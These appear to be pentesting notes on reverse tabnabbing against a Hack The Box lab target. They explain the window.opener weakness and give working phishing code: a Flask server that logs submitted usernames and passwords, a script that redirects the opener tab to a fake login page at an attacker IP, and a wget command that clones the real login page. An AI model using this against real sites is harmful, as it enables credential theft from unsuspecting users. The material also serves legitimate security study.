Phishing Attacks

Reverse Tabnabbing

Documentation and original Writeup

If the link uses target="_blank" and doesn’t include rel="noopener" or rel="noreferrer", the new tab gets access to the original page via the window.opener object.

Vulnerable link
<a href="https://attacker-site.com" target="_blank">View article</a>
On the attacker site 
window.opener.location = 'https://phishing-site.com/login';

Craft the phishing attack

Set up a Flask web server:
from flask import Flask, request, render_template
app = Flask(__name__)
@app.route('/writeup.html', methods=['GET'])
def writeup():
return render_template('writeup.html')
@app.route('/accounts/login/', methods=['GET','POST'])
def login():
if request.method == "POST":
username = request.form.get('login')
password = request.form.get('password')
print("Got username and password: {}:{}".format(username,password))
return render_template('login.html')
else:
return render_template('login.html')
app.run(host="10.10.14.172",port=8000)
Altered the .html file to redirect to own version of login.html
<!doctype html>
<html>
Example Writeup
<script>
if (window.opener)
window.opener.parent.location.replace('http://10.10.14.172/accounts/login/');
if (window.parent != window)
window.parent.location.replace('http://10.10.14.172/accounts/login/');
</script>
</html>
Clone the login page for the platform:
wget http://developer.htb/accounts/login/ -O templates/login.html

  • Change the CSS and JS imports to point to a more credible site.

  • Just lunch the attack submitting the .html file

PreviousNFCNextBinaries

Last updated